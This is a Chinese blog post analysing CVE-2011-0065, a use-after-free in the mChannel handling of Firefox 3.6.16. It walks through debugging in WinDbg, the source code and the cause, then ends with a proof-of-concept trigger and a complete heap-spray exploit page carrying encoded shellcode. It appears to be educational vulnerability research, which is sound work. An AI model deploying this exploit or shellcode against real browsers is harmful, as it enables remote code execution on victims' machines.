CVE-2011-0065 Firefox mChannel UAF漏洞

最新推荐文章于 2024-06-14 16:45:25 发布
最新推荐文章于 2024-06-14 16:45:25 发布
阅读量1.6k 收藏
点赞数
分类专栏: 漏洞分析 文章标签: 漏洞 firefox 软件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/syumlyyc/article/details/60580121
版权

软件名称: Firefox

软件版本:Firefox 3.6.16

漏洞模块xul.dll

操作系统:windows XP/7/8/8.1

漏洞编号:CVE-2011-0065

危害等级:高危

漏洞类型释放重引用

威胁类型:远程

1. 软件简介

     Mozilla Firefox是一款非常流行的开源WEB浏览器。SeaMonkey是开源的Web浏览器、邮件和新闻组客户端、IRC会话客户端和HTML编辑器。 

2. 漏洞成因

Mozilla Firefox 3.5.19之前版本,3.6.17之前的3.6.x版本以及SeaMonkey 2.0.14之前版本中存在释放后使用漏洞。远程攻击者可以借助与OBJECT's mChannel有关的向量执行任意代码

3. 利用过程

3.0 windbg设置

首先添加windbg关于Firefox的符号表地址

 

3.1漏洞触发

3.1.1 poc

<html>

<body>

<object id="d"><object>

<script type="text/javascript">

var e;

e=document.getElementById("d");

 

e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object('0c'),0);

e.data = "";

 

</script>

</body>

</html>

 

 

3.1.2 触发异常

运行FireFox并且用windbg附加它,然后运行刚才的Poc,断到异常处

 

然后用kv指令查看此时的堆栈信息,可以看到栈顶的返回地址68cf4e75

 

ub指令查看0x68cf4e75地址前面的指令,漏洞是出现在xul.dll模块中

 

根据C++成员函数this指针调用约定,可以知道上面的ecx是虚表函数,eax是对象地址,而call dword ptr ds[ecx+18]调用的整是某个对象的方法,即虚函数。

查看xul!nsObjectLoadingContent::LoadObject+0xf2发现有两个同名函数。

 

根据上面触发漏洞时栈顶的返回地址68cf4e75可以知道这里调用的是:

Matched: 68cf4d6d xul!nsObjectLoadingContent::LoadObject (class nsIURI *, int, class nsCString *, int)

因此,对68cf4d6d下断点:

0:000> bp 68cf4d6d

另外,从poc代码中可以看到关键函数onChannelRedirect 因此我们可以直接在winDbg中搜索函数,但是发现很多类里面都包含着onChannelRedirect 方法

 

但是刚才我们已经找到了,触发漏洞的类是xul!nsObjectLoadingContent,通过搜索,该类里也包含onChannelRedirect方法,连同其参数也一并列了出来,前两个参数为类对象

 

因此对xul!nsObjectLoadingContent::onChannelRedirect下断点,重新载入poc.html执行后,发现确实可以断下

 

 

查看此时它的三个参数,其中第二个参数是对象067a3e90,其余均为0

 

分析该函数的反汇编代码

 

上面的调试信息已经给出了源码文件的路径和行数,因此我们可以直接查看nsObjectLoadingContent::onChannelRedirect函数的源码,可以通过http://hg.mozilla.org/releases/mozilla-1.9.2/file/c24f21581d77/content/base/src/nsObjectLoadingContent.cpp获取在线代码

NS_IMETHODIMP

nsObjectLoadingContent::OnChannelRedirect(

nsIChannel *aOldChannel,                                          

nsIChannel *aNewChannel,                                          

PRUint32    

aFlags)

{  

// If we're already busy with a new load, or have no load at all,  

// cancel the redirect. 

 if (!mChannel || aOldChannel != mChannel)

 {    

return NS_BINDING_ABORTED; 

 }  

if (mClassifier)

 {   

 mClassifier->OnRedirect(aOldChannel, aNewChannel);  

}  

mChannel = aNewChannel; 

/***************************************************************/

将新对象067a3e90赋予mChannel对象,但由于Firefox本身的垃圾回收机制,在OnChannelRedirect函数调用完毕后,它会回收不再使用的对象,即尽在本函数内使用aNewChannel对象,此时mChannel就成了悬挂指针

/***************************************************************/

 

 return NS_OK;

}

 

动态调试一下,先在xul!nsObjectLoadingContent::LoadObject+0xfc下断点,

bp 68cf4d6d + fc

 

执行后断下,可以发现这里引用的对象就是前面的xul!nsObjectLoadingContent::OnChannelRedirect的第二个参数值0x0

 

单步执行下去就可以出发异常,因此虚表指针被篡改,导致索引虚函数时出错,进而导致程序崩溃。

 

3.2漏洞利用

为了实现任意代码执行,需要在mChannel对象释放后,用可控数据覆盖,填充它,因此,可以在nChannelRedirect函数执行完成后,紧跟着申请一块相同的内存:

e = document.getElementById("d");

e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)

fake_obj_addr = unescape("\x1C%u0c0c")

执行后,虚表指针就会被0x0c0c001c填充,从而控制程序的执行流程

接下来只需要利用Heap Spray技术将shellcode喷射到0x0c0c0034de位置即可实现执行任意代码。

 

4. exploit

 

<html>

<body>

<object id="d"><object>

<script type="text/javascript">

 

e = document.getElementById("d");

e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)

fake_obj_addr = unescape("\x1C%u0c0c")

 

//%

// taken and modified from adobe_flashplayer_newfunction.rb %u1a77%u3e43  65e3f263  7D66A4E8

var sc = unescape("%u4141%u4141%u0028%u0c0c%uc012%u5ddb%u4141%u4141%ua4e8%u7d66%u4141%u4141%uffae%u65e3%u4141%u4141%u0028%u0c0c%u4141%u4141%u4141%u4141%u4141%u4141%u1ad4%u7c80%u0084%u0c0c%u0028%u0c0c%u0400%u0000%u0040%u0000%u0028%u0c0c%uf00d%ubeef%u4413%u7c87%u0048%u0c0c%u0c00%u0c0c%u0400%u0000%u0040%u0000%u7174%u7276%u8646%ub0fc%u677b%u85bf%ubed6%u4fa8%uf987%u109b%uebd1%u2425%u0591%u349f%u9892%u3c4b%u731d%u7c78%u0c75%u42b7%ub997%u4e8d%ue389%ua927%u437f%u1c93%ub596%ud53b%ub6b4%u7748%u3115%uc7fe%uf8c0%u492c%u354a%u90b3%ud422%u14b1%ue083%ufd03%u2ab2%u3fe2%uf588%uba99%u047a%u2fb8%u7947%u3d2d%u7679%ubb41%ubba9%ub6b5%u2c71%u93ba%u2173%u7de1%u983d%u3fb1%ub88d%u9937%u6b14%u2ff9%u9134%u664f%u9fa8%u277e%u7a4e%u0147%u25e2%u2b46%u0cfd%u1cb2%u3590%ub9b3%u1d77%uf680%u3cd6%ueb8c%u1240%u3af8%u2dd4%u677f%u7241%u087c%u33e0%u0dfc%u9b97%u4b96%uf51b%ue381%u0543%u7b70%u0474%u00b0%ub4d5%ub724%u4978%u4a75%u1592%u48bf%ube42%u7c99%u7714%u9142%u2cb7%u24be%u9b2d%u7d71%u7b7a%u663f%u4398%u7973%ud428%u3d70%ub2b5%u0592%ub347%ubb96%u34b8%ub44a%ub904%u3578%ufc18%u904f%u41a8%ue211%ue30a%ud01a%ud6d2%u8da9%u0c7f%u4627%u13bf%ud3f7%ub1f8%u4840%u3715%u9f97%u3c75%uf50b%ud539%u7293%u324b%u30eb%ub6f9%u1949%uc1ff%u25e1%ue029%ufd38%ub067%u4e1c%u1dba%u742f%u760d%u7c7e%u277d%u4273%ufd02%u2d79%ua99b%ub11d%u7598%uf803%u7f35%ue320%u3f43%ub8ba%u7b9f%uf52b%u7a92%ub42c%u3dbe%u7191%u7072%ub766%u1c2f%ubf15%ub367%ubbb9%ue084%u4a41%u8925%u0cf9%u7677%ufc13%ueb81%u0d46%u4f90%u2147%u78d6%u9914%ud469%u05b2%u3cb5%u88b6%u4be1%u4897%u8da8%u24b0%u3334%u4ed5%u4093%u7496%u4904%ue20a%u7e37%u277f%u70b5%ue201%ub034%u7974%u1c7b%ud480%u4a8d%ua9b3%ue08c%u777e%u7204%u9947%ud232%u0dfc%u3776%u247a%u0b2f%ue1d1%u413f%ub8b2%u391d%u4ff5%ub625%u752d%u2973%u91f8%u909f%u4b7c%ue308%uf712%uc0c6%u9bfd%ua8b7%u40b9%u6796%u052c%u7149%u9843%u3cb1%u1935%u78eb%u9366%u144e%ud530%u9215%ubf0c%ubb42%u487d%u3dbe%ub4ba%ud687%u1146%u97f9%ueb20%u7f74%u777d%u4079%u8d3c%u0c9f%u4292%ufd6b%u97ba%ud618%ub798%uf909%u78b6%u7375%ub447%u227b%u23e0%ue3c1%ub02f%u1d70%u0035%u02e1%ub9d4%u7c37%uf83a%ue228%u717a%ud51b%u1472%u9646%u4148%ufc3b%u3d0d%u913f%ub3b2%ubb67%u9905%u2576%u1566%u93a9%ubfb8%u4a90%u7ea8%ueb31%u8434%u4fe2%u1c7b%u7cbe%u754e%uf538%u277a%ud085%u10e3%ue1d3%u724b%u7f2c%u7604%u8343%ue0f6%u9b49%u2d78%u247e%ub1b5%u3d70%u992d%u714f%ubb25%u9f48%u8da8%u3c7d%ubf9b%u4234%u1473%u4a41%u77b2%u9015%ufd40%u374b%u921c%u793f%u2c24%u1dd5%u0493%ub6b8%u4727%ub3b4%ua9b9%u67b5%ubad6%ube46%u49b1%u7491%u2a05%u0cf8%u2f98%u0df5%u4e96%u1a97%ub0d4%u6635%uf986%ufcb7%udb43%ub8d7%u42b3%u12d2%u74d9%uf424%u295f%ub1c9%u3144%u1947%u4703%u8319%ufcef%ub751%uf90b%ue10e%udad8%u23c4%u91f3%u7553%ub13a%u0410%ub18c%ueb50%ub367%u7880%u3431%u0033%ucf9e%uc575%ud791%uc60c%ue977%ud73f%u8969%u4434%u6e4e%ud0c1%ue5b2%uf281%uf8b2%u88c3%ue309%ud598%u12ad%u0a75%u5d99%uf902%u5c69%u33fa%u6e91%uc8c2%u15c1%u4402%ud71d%ua84d%u1020%u47ba%ue219%u8018%ufb2b%u8aeb%ufaf7%u4c00%uf073%u1a9d%u15d9%uf620%u2155%u09a9%ua382%u2de9%ud54e%u9f32%u3c66%u6960%ub793%u024a%u86d2%u3f44%ufeb8%u40c7%u00c2%ufb7e%u4439%udcfe%uc9a0%uc079%u7c00%u776d%u7fb7%u0192%u880d%u7e04%ua8e2%u1695%u9ac9%u833b%uae45%u2e30%ud8e4%u94ea%u5002%u83f4%u37ed%ua2fc%ue8d0%u1c47%u4576%uda0b%u726b%u0d21%u85f2%u323a%u169d%u95bc%u817e%u415d%u131a%uc0f5%ue081%uea76%u8f92%u2824%u192f%u5837%u3977%ub997%u74ef%uff84%ueece%u6f58%ucf7c%u00f4%u2f52%ub762%u4ae2%u2b06%u5dc2%uff5e%u4e00%ue1d7%ubc78%ub2b5%u122b%ue5c6%u52fd%uf968%u5aab")

 

var ret_addr = unescape("%u0024%u0c0c")

while(ret_addr.length+20+8 < 0x100000-18-12-12-12) {ret_addr += ret_addr}

var b = ret_addr.substring(0,(0x48-0x24)/2)

b += sc

b += ret_addr

var next = b.substring(0,0x10000/2)

while(next.length<0x800000) {next += next}

var again = next.substring(0,0x80000 - (0x1020-0x08)/2)

array = new Array()

for (n=0;n<0x1f0;n++){

array[n] = again + sc

}

 

e.data = ""

</script></body></html>

5.参考资料

《漏洞战争:软件漏洞分析精要》 林桠泉 


syumlyyc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2011-0065
weixin_30367873的博客
01-30 188
环境 备注 操作系统 Windows 7 x86 sp1 专业版 漏洞软件 Firefox 版本号:3.6.16 调试器 Windbg 版本号:6.12.0002.633 0x00 漏洞描述 在Firefox浏览器3.5.19之前的版本,以及3.6.17之前的3.6.x版本中存在UAF漏洞.mChannel对象在被释放后...
CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability
爱杀之爪的矩阵
08-19 2159
CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability   Author: instruder of Code Audit Labs of vulnhunt.com Time: 201
CVE-2011-1473: OpenSSL权限许可和访问控制问题漏洞及解决方案
最新发布
世上哪有什么岁月静好,不过是有人替你负重前行
06-14 442
CVE-2011-1473: OpenSSL权限许可和访问控制问题漏洞
重协商攻击(CVE-2011-1473) 漏洞处理
Allen技术小站
09-02 9499
重协商攻击(CVE-2011-1473) 漏洞处理
最新Firefox 0day远程执行代码漏洞CVE-2016-9079 绿盟科技发布技术分析与防护方案...
weixin_34025151的博客
09-01 455
火狐浏览器上暴露出一个JavaScript 0Day漏洞CVE-2016-9079,而且已经被用于攻击Tor用户。据绿盟科技预警通告称,“该漏洞是一个存在于SVG Animation模块中的释放后重用(UAF)漏洞,当用户使用Firefox浏览包含恶意Javascript和SVG代码的页面时,会允许攻击者在用户的机器上远程执行代码。受该漏洞影响的平...
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
MS11-049:Microsoft XML Editor 信息泄露漏洞(2543893)(CVE-2011-1280)
02-09
远程主机上的应用程序存在信息泄露漏洞。当解析特别构建的 Web Service Discovery (.disco) 文件时,外部 XML 实体可接受不受信任的用户输入。远程攻击者可通过诱骗用户打开特别构建的 .disco 文件来利用此问题,...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2016-9079:Ubuntu x64上CVE-2016-9079的演示漏洞利用
04-28
CVE-2016-9079 Ubuntu x64上CVE-2016-9079的演示漏洞利用
绿盟科技互联网安全威胁周报2016.35 请关注Firefox浏览器远程代码执行漏洞CVE-2016-9079...
weixin_33938733的博客
09-01 260
绿盟科技发布了本周安全通告,周报编号NSFOCUS-16-35,绿盟科技漏洞库本周新增44条,其中高危23条。本次周报建议大家关注Firefox浏览器远程代码执行漏洞,会允许攻击者在用户的机器上远程执行代码。受该漏洞影响的平台包括Windows,Mac OS以及Linux。请使用Firefox浏览器的用户及时升级到最新版本。 焦点漏洞 Firefo...
SSL漏洞处理
热门推荐
逸兴遄飞的专栏
08-15 1万+
openssl相关漏洞处理 网络设备在客户的机房上线,一般都会使用扫描工具进行扫描,以查看是否存在漏洞风险,最近的项目中就出现了如下的风险漏洞。 SSL/TLS 受诫礼(BAR-MITZVAH)攻击漏洞(CVE-2015-2808)【原理扫描】 服务器支持 TLS Client-initiated 重协商攻击(CVE-2011-1473)【原理扫描】 受诫礼攻击漏洞 临时解...
firefox附加组件开发者指南(三)——XUL简介(下)
JumuFENG's blog
03-04 2863
其他XUL功能 Overlay XUL的一个与众不同的特性就是overlay。可以将多个XUL文档联合起来,并当做一个单独的XUL文档来处理。在Firefox中,这用来对各种功能进行模块化并实现了扩展。 通过在XML声明中插入一个xul-overlay处理指令和根元素的开始标签,通过xul-overlay指定的XUL文档会在当前当前的XUL文档读取的同时进行读取。实际显示的XUL文档是原始X
firefox附加组件开发者指南(三)——XUL简介(上)
JumuFENG's blog
03-04 3147
这一章内容较多,故分三篇:XUL简介、XUL中可用的窗体部件、其他XUL功能。 在学习如何开发扩展之前,我们来了解XUL,基于XML的用户接口语言,XUL是扩展的基本组成之一。 概述 XUL概览 XUL是一种基于XML的语言,是为mozilla浏览器的GUI标记语言而开发的。结合HTML和脚本语言去开发用户界面的早期实验经历了很长一个过程,可以认为XUL是这个过程的演化结果。用在win
%u7F51%u7BA1%u4E4B%u661F NetStar %u9AD8%u6548%u7684%u7F51%u7BA1%u8F6F%u4EF6
weixin_34346099的博客
05-16 1万+
%u7F51%u7BA1%u4E4B%u661F NetStar %u9AD8%u6548%u7684%u7F51%u7BA1%u8F6F%u4EF6%u8F6F%u4EF6%u540D%u79F0:NetStar%u7F51%u7EDC%u8FD0%u7EF4%u7EFC%u5408%u7BA1%u7406%u7CFB%u7EDF%u8F6F%u4EF6%u5927%u5C...
服务器支持 TLS Client-initiated 重协商攻击(CVE-2011-1473复现验证)
qq_45300786的博客
06-08 1万+
一、使用bash脚本(tls-reneg )可验证 https://github.com/c826/bash-tls-reneg-attack ./tls-reneg.sh host:端口 二、使用openssl可验证 openssl s_client -connect host:端口 三、使用testssl脚本可验证 一、SWEET32(CVE-2016-2183) 使用3DES的任何密码都易受SWEET32影响 命令:./testssl.sh -W 192.168.1.22 二、DROWN(CVE-
cve-2011-0027漏洞分析
小强的博客
07-25 2040
这个漏洞是整数溢出漏洞漏洞环境为win7+IE8 ,调试工具为windbg,静态分析工具为IDA。 主要参考《漏洞战争》相关介绍,实际分析了一下。 首先启动页堆。 打开IE8,windbg附加进程,然后IE打开poc文件。 poc.html文件如下: function Start() { localxmlid1 = document.getElementById
tomcat7存在cve-2011-1473漏洞,该如何修复
06-12
CVE-2011-1473是一个影响Apache Tomcat 6.x版本的漏洞,不过Tomcat 7.x版本也存在一些类似的漏洞。如果您的Tomcat 7.x版本存在CVE-2011-1473漏洞,则需要按照以下步骤进行修复: 1. 首先,确认您的Tomcat 7.x版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值